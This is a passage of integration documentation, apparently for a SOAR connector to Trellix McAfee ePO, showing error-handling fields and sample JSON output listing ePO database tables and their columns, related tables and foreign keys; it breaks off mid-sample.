CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

name

startDate

endDate

userName

status

taskSource

duration

Send Email

11/25/2019 2:07:50 PM

11/25/2019 2:07:50 PM

system

Completed

response

Less than a minute

Send DXL Event

11/25/2019 2:07:50 PM

11/25/2019 2:07:50 PM

system

Completed

response

Less than a minute

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Sub Task History failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 400.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: 'taskLogId' must be an integer less than 9223372036854775808.

Error Sample Data

List Sub Task History failed.

Status Code: 400.

Message: 'taskLogId' must be an integer less than 9223372036854775808.

List Table

Retrieves a list of all tables.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "name": "workloaddetailVcenter.table.name",
        "target": "workloaddetailVcenter",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- ------ ------- ---------- -------- ------ -------\r\n id int True True False True True \r\n ePOLeafNodeId int True True False True True \r\n status string True True False True False \r\n",
        "relatedTables": "\r\n Name\r\n -------------\r\n sasvmsetting\r\n vminfovcenter\r\n ePOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n --------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n workloaddetailVcenter ePOLeafNodeId ePOLeafNode AutoID False False True \r\n workloaddetailVcenter ePOLeafNodeId vminfovcenter EPO_LEAF_NODE_ID False False True \r\n workloaddetailVcenter id sasvmsetting sarVMStatusId False False True \r\n"
    },
    {
        "name": "Network discovery scan error",
        "target": "UDLP_Operational_NetworkDiscoveryFailure_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Network discovery scan error details",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- -------------------- ------- ---------- -------- ------ -------\r\n EventID long False False False True True \r\n ScanUsername udlp_searchable_text True True True True False \r\n Reason enum True True True True False \r\n ReasonDetails string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "DLP Data at Rest (Endpoint) Incidents History",
        "target": "UDLP_EPD_Incidents_Archive",
        "type": "join",
        "databaseType": "",
        "description": "All incidents related to data at rest (Endpoint)",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------------ -------------------------------- ------- ---------- -------- ------ -------\r\n IncidentId long True True True True True \r\n OriginalIncidentId long True True True True True \r\n IncidentType enum True True True True False \r\n ViolationLocalTime udlp_abstimestamp_endpoint_col True True True True False \r\n ViolationTimezone string_lookup True True True True False \r\n ViolationUTCTime udlp_abstimestamp_col True True True True False \r\n ViolationCustomTime udlp_abstimestamp_withoffset_col True True True True False \r\n ComputerID int False False False True True \r\n UserID int False False False True True \r\n Severity enum True True True True False \r\n StatusId udlp_common_status_col True True True True False \r\n ResolutionId udlp_common_resolution_col True True True True False \r\n Reviewer udlp_reviewer_col True True True True False \r\n McAfeeAgentGuid udlp_searchable_text True True True True False \r\n DlpAgentVersion string_lookup True True True True False \r\n EvidenceCount int True True True True True \r\n TotalMatchCount int True True True True True \r\n TotalContentSize udlp_kilo_col True True True True True \r\n PolicyInfoId int False False False True True \r\n ClassificationsToDisplay string True False False True False \r\n RulesToDisplay string True False True True False \r\n RuleSetToDisplay string True False True True False \r\n ConnectivityState enum True True True True False \r\n ActualAction enum True True True True False \r\n ExpectedAction enum True True True True False \r\n FailureReason enum True True True True False \r\n LastUpdateTimestamp udlp_abstimestamp_col True True True True False \r\n ReportingProduct enum True True True True False \r\n ShortMatchString udlp_contains_words_col True False False True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------------------------------------\r\n UDLP_EPD_IncidentDiscoverySummary_Archive\r\n UDLP_EventComputers\r\n UDLP_EventUsers\r\n UDLP_EPD_IncidentLabelsView_Archive\r\n UDLP_EPD_IncidentRules_Archive\r\n UDLP_EPD_IncidentEvidences_Archive\r\n UDLP_IncidentResolutions\r\n UDLP_EPD_IncidentExport\r\n UDLP_IncidentStatuses\r\n UDLP_EventPolicyInfo\r\n UDLP_EPD_IncidentClassification_Archive\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------- -------------- ----------------------- ------------------- --------------- ----------- ------------\r\n UDLP_EPD_Incidents_Archive ComputerID UDLP_EventComputers ID False False True \r\n UDLP_EPD_Incidents_Archive UserID UDLP_EventUsers UserId False False True \r\n UDLP_EPD_Incidents_Archive StatusId UDLP_IncidentStatuses StatusID False False True \r\n UDLP_EPD_Incidents_Archive ResolutionId UDLP_IncidentResolutions ResolutionID False False True \r\n UDLP_EPD_Incidents_Archive PolicyInfoId UDLP_EventPolicyInfo PolicyInfoId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentRules_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentLabelsView_Archive LabelIncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentDiscoverySummary_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentEvidences_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentClassification_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentExport IncidentId False False True \r\n"
    },
    {
        "name": "groupinfo.table.name",
        "target": "groupinfo",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------ ------- ---------- -------- ------ -------\r\n GROUP_NAME string True False False True False \r\n AUTO_ID int True True False True True \r\n PARENT_ID int False True False True True \r\n ACCOUNT_ID int False True False True True \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "epoproductproperties.table.name",
        "target": "epoproductproperties",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------ ------- ---------- -------- ------ -------\r\n ParentID int True True False True True \r\n ProductCode string True True False True False \r\n ProductVersion string True True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "McAfee Active Response Server Properties",
        "target": "EPOProdPropsView_MARSERVER",
        "type": "join",
        "databaseType": "",
        "description": "McAfee Active Response Server Properties",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------- -------------- ------- ---------- -------- ------ -------\r\n LeafNodeID int False False False True True \r\n ProductPropertiesID int False False False True True \r\n ProductFamily string False False False True False \r\n FamilyDispName string False False False True False \r\n ProductCode string False False False True False \r\n productversion productVersion True True True True False \r\n language string_enum True True True True False \r\n hotfix string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------\r\n EPOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n EPOProdPropsView_MARSERVER LeafNodeID EPOLeafNode AutoID False True False \r\n"
    },
    {
        "name": "Resolutions",
        "target": "UDLP_IncidentResolutions",
        "type": "join",
        "databaseType": "",
        "description": "Resolutions",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- ------------------ ------- ---------- -------- ------ -------\r\n ResolutionID long False False False True True \r\n ResolutionKey udlp_fk_lookup_col True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "DLP Discovery Scans",
        "target": "UDLP_DiscoveryScansRegDocView",
        "type": "join",
        "databaseType": "",
        "description": "Status of Discovery scans",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------- --------------------- ------- ---------- -------- ------ -------\r\n ScanId string False False False True False \r\n Name string_lookup True True True True False \r\n ServerName string_lookup False True False True False \r\n ServerMachineName string_lookup False True False True False \r\n StartTime udlp_abstimestamp_col True True True True False \r\n EndTime udlp_abstimestamp_col True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Mobile Device Information",
        "target": "UDLP_IncidentMobileDevice_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Mobile Device Information",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n --------------- -------------------- ------- ---------- -------- ------ -------\r\n IncidentId long False False False True True \r\n MobileDeviceID udlp_searchable_text True True True True False \r\n MobileOs enum True True True True False \r\n MobileUserAgent udlp_searchable_text True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Manual Registration Documents Classification",
        "target": "UDLP_RegisterDocumentsClassification",
        "type": "join",
        "databaseType": "",
        "description": "Manual Registration Documents Classification",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------ ------------- ------- ---------- -------- ------ -------\r\n RegDocID int False False False True True \r\n ClassificationID string False False False True False \r\n ClassificationName string_lookup False True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "McAfee Threat Intelligence Exchange Server Roll-up Properties",
        "target": "EPORollup_ProductPropertiesTIE",
        "type": "join",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------------------ ------- ---------- -------- ------ -------\r\n ServerId non_arithmetic_int False False False True False \r\n ParentId non_arithmetic_int False False False True False \r\n ExternalId non_arithmetic_int False False False True False \r\n productversion productVersion True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -------------------\r\n EpoRollup_Computers\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------------------------ ----------------- ------------------- ------------------- --------------- ----------- ------------\r\n EPORollup_ProductPropertiesTIE ServerId,ParentId EpoRollup_Computers ServerId,ExternalId False True False \r\n"
    },
    {
        "name": "vpcflowLog.table.name",
        "target": "vpcflowLog",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------------- ------ ------- ---------- -------- ------ -------\r\n AUTO_ID int True True False True True \r\n LATEST_TRAFFIC_END_TIME string True True False True False \r\n EPO_LEAF_NODE_ID int True True False True True \r\n ANALYSIS int True True False True True \r\n FROMTO_ADDRESS string True True False True False \r\n FROMTO_PORT int True True False True True \r\n NUMBER_OF_OCCURANCES int True True False True True \r\n TRAFFIC_TYPE int True True False True True \r\n TRAFFIC_ACTION int True True False True True \r\n IS_NEW int True True False True True \r\n",
        "relatedTables": "\r\n Name\r\n --------------\r\n gridthreatlist\r\n ePOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------ -------------- ----------------- ------------------- --------------- ----------- ------------\r\n vpcflowLog EPO_LEAF_NODE_ID ePOLeafNode AutoID False False True \r\n vpcflowLog AUTO_ID gridthreatlist VPC_FLOWLOG_ID False False True \r\n"
    },
    {
        "name": "AWS Volume Properties",
        "target": "MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid",
        "type": "target",
        "databaseType": "",
        "description": "Volume properties specific to Volume from Amazon Web Service ",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------- ------ ------- ---------- -------- ------ -------\r\n VOLUME_AUTO_ID int False False False True True \r\n instance_device string True True True True False \r\n reserved_for_root string True True True True False \r\n snapshot_id string True True True True False \r\n tags string True True True True False \r\n volume_size string True True True True False \r\n volume_state string True True True True False \r\n create_time string True True True True False \r\n volume_type string True True True True False \r\n encryption_status string True True True True False \r\n alias_key_name string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------\r\n MDCC_VOLUME\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid VOLUME_AUTO_ID MDCC_VOLUME AUTO_ID False True False \r\n"
    },
    {
        "name": "Events received from managed systems",
        "target": "EPOEventFilterDesc",
        "type": "join",
        "databaseType": "",
        "description": "Retrieves information about Threat Events sent from managed systems.",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------- ------------------------- ------- ---------- -------- ------ -------\r\n EventId eventIdInt False False False True True \r\n Name string_lookupWithResolver True True True True False \r\n Language string False False False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Label ",
        "target": "UDLP_OperationalLabelInfoView_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Label ",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n --------- -------------- ------- ---------- -------- ------ -------\r\n EventId long True False False True True \r\n LabelName udlp_oneToMany False True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Task Log Entries",
        "target": "OrionTaskLogTask",
        "type": "target",
        "databaseType": "",
        "description": "Allows you to query upon log entries created by a top-level task.",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------------- ------- ---------- -------- ------ -------\r\n Id long False False False True True \r\n Name string_lookup True True True True False \r\n StartDate timestamp True True True True False \r\n EndDate timestamp True True True True False \r\n UserName string_lookup True True True True False \r\n Status enum True True True True False \r\n TaskSource string_enum True True True True False \r\n Duration long True False False True False \r\n TenantId int False False False True True \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "name": "workloaddetailVcenter.table.name",
        "target": "workloaddetailVcenter",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- ------ ------- ---------- -------- ------ -------\r\n id int True True False True True \r\n ePOLeafNodeId int True True False True True \r\n status string True True False True False \r\n",
        "relatedTables": "\r\n Name\r\n -------------\r\n sasvmsetting\r\n vminfovcenter\r\n ePOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n --------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n workloaddetailVcenter ePOLeafNodeId ePOLeafNode AutoID False False True \r\n workloaddetailVcenter ePOLeafNodeId vminfovcenter EPO_LEAF_NODE_ID False False True \r\n workloaddetailVcenter id sasvmsetting sarVMStatusId False False True \r\n"
    },
    {
        "name": "Network discovery scan error",
        "target": "UDLP_Operational_NetworkDiscoveryFailure_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Network discovery scan error details",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- -------------------- ------- ---------- -------- ------ -------\r\n EventID long False False False True True \r\n ScanUsername udlp_searchable_text True True True True False \r\n Reason enum True True True True False \r\n ReasonDetails string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "DLP Data at Rest (Endpoint) Incidents History",
        "target": "UDLP_EPD_Incidents_Archive",
        "type": "join",
        "databaseType": "",
        "description": "All incidents related to data at rest (Endpoint)",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------------ -------------------------------- ------- ---------- -------- ------ -------\r\n IncidentId long True True True True True \r\n OriginalIncidentId long True True True True True \r\n IncidentType enum True True True True False \r\n ViolationLocalTime udlp_abstimestamp_endpoint_col True True True True False \r\n ViolationTimezone string_lookup True True True True False \r\n ViolationUTCTime udlp_abstimestamp_col True True True True False \r\n ViolationCustomTime udlp_abstimestamp_withoffset_col True True True True False \r\n ComputerID int False False False True True \r\n UserID int False False False True True \r\n Severity enum True True True True False \r\n StatusId udlp_common_status_col True True True True False \r\n ResolutionId udlp_common_resolution_col True True True True False \r\n Reviewer udlp_reviewer_col True True True True False \r\n McAfeeAgentGuid udlp_searchable_text True True True True False \r\n DlpAgentVersion string_lookup True True True True False \r\n EvidenceCount int True True True True True \r\n TotalMatchCount int True True True True True \r\n TotalContentSize udlp_kilo_col True True True True True \r\n PolicyInfoId int False False False True True \r\n ClassificationsToDisplay string True False False True False \r\n RulesToDisplay string True False True True False \r\n RuleSetToDisplay string True False True True False \r\n ConnectivityState enum True True True True False \r\n ActualAction enum True True True True False \r\n ExpectedAction enum True True True True False \r\n FailureReason enum True True True True False \r\n LastUpdateTimestamp udlp_abstimestamp_col True True True True False \r\n ReportingProduct enum True True True True False \r\n ShortMatchString udlp_contains_words_col True False False True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------------------------------------\r\n UDLP_EPD_IncidentDiscoverySummary_Archive\r\n UDLP_EventComputers\r\n UDLP_EventUsers\r\n UDLP_EPD_IncidentLabelsView_Archive\r\n UDLP_EPD_IncidentRules_Archive\r\n UDLP_EPD_IncidentEvidences_Archive\r\n UDLP_IncidentResolutions\r\n UDLP_EPD_IncidentExport\r\n UDLP_IncidentStatuses\r\n UDLP_EventPolicyInfo\r\n UDLP_EPD_IncidentClassification_Archive\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------- -------------- ----------------------- ------------------- --------------- ----------- ------------\r\n UDLP_EPD_Incidents_Archive ComputerID UDLP_EventComputers ID False False True \r\n UDLP_EPD_Incidents_Archive UserID UDLP_EventUsers UserId False False True \r\n UDLP_EPD_Incidents_Archive StatusId UDLP_IncidentStatuses StatusID False False True \r\n UDLP_EPD_Incidents_Archive ResolutionId UDLP_IncidentResolutions ResolutionID False False True \r\n UDLP_EPD_Incidents_Archive PolicyInfoId UDLP_EventPolicyInfo PolicyInfoId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentRules_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentLabelsView_Archive LabelIncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentDiscoverySummary_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentEvidences_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentClassification_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentExport IncidentId False False True \r\n"
    },
    {
        "name": "groupinfo.table.name",
        "target": "groupinfo",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------ ------- ---------- -------- ------ -------\r\n GROUP_NAME string True False False True False \r\n AUTO_ID int True True False True True \r\n PARENT_ID int False True False True True \r\n ACCOUNT_ID int False True False True True \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "epoproductproperties.table.name",
        "target": "epoproductproperties",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------ ------- ---------- -------- ------ -------\r\n ParentID int True True False True True \r\n ProductCode string True True False True False \r\n ProductVersion string True True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "McAfee Active Response Server Properties",
        "target": "EPOProdPropsView_MARSERVER",
        "type": "join",
        "databaseType": "",
        "description": "McAfee Active Response Server Properties",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------- -------------- ------- ---------- -------- ------ -------\r\n LeafNodeID int False False False True True \r\n ProductPropertiesID int False False False True True \r\n ProductFamily string False False False True False \r\n FamilyDispName string False False False True False \r\n ProductCode string False False False True False \r\n productversion productVersion True True True True False \r\n language string_enum True True True True False \r\n hotfix string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------\r\n EPOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n EPOProdPropsView_MARSERVER LeafNodeID EPOLeafNode AutoID False True False \r\n"
    },
    {
        "name": "Resolutions",
        "target": "UDLP_IncidentResolutions",
        "type": "join",
        "databaseType": "",
        "description": "Resolutions",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- ------------------ ------- ---------- -------- ------ -------\r\n ResolutionID long False False False True True \r\n ResolutionKey udlp_fk_lookup_col True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "DLP Discovery Scans",
        "target": "UDLP_DiscoveryScansRegDocView",
        "type": "join",
        "databaseType": "",
        "description": "Status of Discovery scans",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------- --------------------- ------- ---------- -------- ------ -------\r\n ScanId string False False False True False \r\n Name string_lookup True True True True False \r\n ServerName string_lookup False True False True False \r\n ServerMachineName string_lookup False True False True False \r\n StartTime udlp_abstimestamp_col True True True True False \r\n EndTime udlp_abstimestamp_col True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Mobile Device Information",
        "target": "UDLP_IncidentMobileDevice_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Mobile Device Information",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n --------------- -------------------- ------- ---------- -------- ------ -------\r\n IncidentId long False False False True True \r\n MobileDeviceID udlp_searchable_text True True True True False \r\n MobileOs enum True True True True False \r\n MobileUserAgent udlp_searchable_text True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Manual Registration Documents Classification",
        "target": "UDLP_RegisterDocumentsClassification",
        "type": "join",
        "databaseType": "",
        "description": "Manual Registration Documents Classification",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------ ------------- ------- ---------- -------- ------ -------\r\n RegDocID int False False False True True \r\n ClassificationID string False False False True False \r\n ClassificationName string_lookup False True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "McAfee Threat Intelligence Exchange Server Roll-up Properties",
        "target": "EPORollup_ProductPropertiesTIE",
        "type": "join",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------------------ ------- ---------- -------- ------ -------\r\n ServerId non_arithmetic_int False False False True False \r\n ParentId non_arithmetic_int False False False True False \r\n ExternalId non_arithmetic_int False False False True False \r\n productversion productVersion True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -------------------\r\n EpoRollup_Computers\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------------------------ ----------------- ------------------- ------------------- --------------- ----------- ------------\r\n EPORollup_ProductPropertiesTIE ServerId,ParentId EpoRollup_Computers ServerId,ExternalId False True False \r\n"
    },
    {
        "name": "vpcflowLog.table.name",
        "target": "vpcflowLog",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------------- ------ ------- ---------- -------- ------ -------\r\n AUTO_ID int True True False True True \r\n LATEST_TRAFFIC_END_TIME string True True False True False \r\n EPO_LEAF_NODE_ID int True True False True True \r\n ANALYSIS int True True False True True \r\n FROMTO_ADDRESS string True True False True False \r\n FROMTO_PORT int True True False True True \r\n NUMBER_OF_OCCURANCES int True True False True True \r\n TRAFFIC_TYPE int True True False True True \r\n TRAFFIC_ACTION int True True False True True \r\n IS_NEW int True True False True True \r\n",
        "relatedTables": "\r\n Name\r\n --------------\r\n gridthreatlist\r\n ePOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------ -------------- ----------------- ------------------- --------------- ----------- ------------\r\n vpcflowLog EPO_LEAF_NODE_ID ePOLeafNode AutoID False False True \r\n vpcflowLog AUTO_ID gridthreatlist VPC_FLOWLOG_ID False False True \r\n"
    },
    {
        "name": "AWS Volume Properties",
        "target": "MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid",
        "type": "target",
        "databaseType": "",
        "description": "Volume properties specific to Volume from Amazon Web Service ",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------- ------ ------- ---------- -------- ------ -------\r\n VOLUME_AUTO_ID int False False False True True \r\n instance_device string True True True True False \r\n reserved_for_root string True True True True False \r\n snapshot_id string True True True True False \r\n tags string True True True True False \r\n volume_size string True True True True False \r\n volume_state string True True True True False \r\n create_time string True True True True False \r\n volume_type string True True True True False \r\n encryption_status string True True True True False \r\n alias_key_name string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------\r\n MDCC_VOLUME\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid VOLUME_AUTO_ID MDCC_VOLUME AUTO_ID False True False \r\n"
    },
    {
        "name": "Events received from managed systems",
        "target": "EPOEventFilterDesc",
        "type": "join",
        "databaseType": "",
        "description": "Retrieves information about Threat Events sent from managed systems.",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------- ------------------------- ------- ---------- -------- ------ -------\r\n EventId eventIdInt False False False True True \r\n Name string_lookupWithResolver True True True True False \r\n Language string False False False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Label ",
        "target": "UDLP_OperationalLabelInfoView_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Label ",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n --------- -------------- ------- ---------- -------- ------ -------\r\n EventId long True False False True True \r\n LabelName udlp_oneToMany False True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Task Log Entries",
        "target": "OrionTaskLogTask",
        "type": "target",
        "databaseType": "",
        "description": "Allows you to query upon log entries created by a top-level task.",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------------- ------- ---------- -------- ------ -------\r\n Id long False False False True True \r\n Name string_lookup True True True True False \r\n StartDate timestamp True True True True False \r\n EndDate timestamp True True True True False \r\n UserName string_lookup True True True True False \r\n Status enum True True True True False \r\n TaskSource string_enum True True True True False \r\n Duration long True False False True False \r\n TenantId int False False False True True \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[[\\r\\n    {\\r\\n        \\\"name\\\": \\\"workloaddetailVcenter.table.name\\\",\\r\\n        \\\"target\\\": \\\"workloaddetailVcenter\\\",\\r\\n        \\\"type\\\": \\\"target\\\",\\r\\n        \\\"databaseType\\\": \\\"\\\",\\r\\n        \\\"description\\\": null,\\r\\n        \\\"columns\\\": \\\"\\\\r\\\\n Name Type Select? Condition? GroupBy? Order? Number? \\\\r\\\\n ------------- ------ ------- ---------- -------- ------ -------\\\\r\\\\n id int True True False True True \\\\r\\\\n ePOLeafNodeId int True True False True True \\\\r\\\\n status string True True False True False \\\\r\\\\n\\\",\\r\\n        \\\"relatedTables\\\": \\\"\\\\r\\\\n Name\\\\r\\\\n -------------\\\\r\\\\n sasvmsetting\\\\r\\\\n vminfovcenter\\\\r\\\\n ePOLeafNode\\\\r\\\\n\\\",\\r\\n        \\\"foreignKeys\\\": \\\"\\\\r\\\\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \\\\r\\\\n --------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\\\\r\\\\n workloaddetailVcenter ePOLeafNodeId ePOLeafNode AutoID False False True \\\\r\\\\n workloaddetailVcenter ePOLeafNodeId vminfovcenter EPO_LEAF_NODE_ID False False True \\\\r\\\\n workloaddetailVcenter id sasvmsetting sarVMStatusId False False True \\\\r\\\\n\\\"\\r\\n    }]\"",
